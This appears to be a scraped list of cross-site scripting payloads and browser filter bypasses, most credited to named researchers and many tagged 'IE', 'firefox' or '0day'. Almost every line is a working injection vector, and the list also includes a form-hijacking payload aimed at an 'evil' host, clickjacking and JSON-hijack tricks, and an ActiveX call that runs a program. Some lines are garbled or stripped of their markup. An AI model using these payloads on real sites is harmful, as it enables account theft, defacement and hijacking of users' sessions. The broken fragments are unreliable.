IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox
<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg></ y="><x" onload=alert('@0x6D6172696F')> #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=<>@mozilla.org/js/function</>;$::<a href="/@superevr/"><>alert</></a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>
<input #ie="" #xss<br="" >="" value="--><body/onload=<code>alert(/ @jackmasa /)//</code>">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))> target it.
Firefox clipboard-hijack without script and css : http://![]()
<![<img src=x:x onerror=alert(/ @jackmasa /)//]-->
E4X <{alert(1)}></{alert(2)}>.(alert(3)).@wtf.(wtf) by @garethheyes
vbscript coool feature chr(&H4141)="A", Chr(7^5)=A and Chr(&O41) =‘A’ by @masa141421356
({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>
VBScript Event Handling: [Sub XXX_OnError MsgBox " @0x6D6172696F " End Sub]
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>
![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa
<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
click
CSS expression <style>*{font-family:'Serif}';x[value=expression(alert(URL=1));]{color:red}</style>
ES #FF for(location of ['javascript:alert(/ff/)']);
E4X function::['location']='javascript'':alert(/FF/)'
HTML5 entity char test
Firefox click <script>eval(test'')</script> by @cgvwzq
CSS and CSS :P
toUpperCase XSS document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase()) by @jackmasa
IE6-8,IE9(quick mode) with jQuery<1.7 $("button").val("<iframe src=vbscript:alert(1)>") by @masa141421356
aha <script src=>alert(/IE|Opera/)</script>
Opera bug? <img src=//\ onload=alert(1)>
Use 127.1 no 127.0.0.1 by @jackmasa
IE vector location='vbscript:alert(1)'
jQuery super less-xss,work in IE: $(URL) 6 chars
Bootstrap tooltip.js xss some other plugins (e.g typeahead,popover) are also the same problem //cc @twbootstrap
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')
IE all version CSRF vector <img lowsrc=//blog.zsec.uk>
Timing vector <img src=//ixss.sinaapp.com/sleep.php>
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"><br>
IE9 <script/onload=alert(1)></script><br>
Webkit and FF <style/onload=alert(1)><br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356<br>
Firefox <img src=javascript:while([{}]);><br>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script><br>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop</p>
<p><button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking <img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: ![]()
<script>document.body.innerHTML=''</script>
Firefox click=>google by @garethheyes
click by @kkotowicz
Opera click variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>
Webkit and Opera click
FF click url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
click
FF ![]()
no referrer by @sneak_
<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>
window.alert("Bonjour !");
</scr<script></font></noscript>
<map name="planetmap"><area a-=">" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>
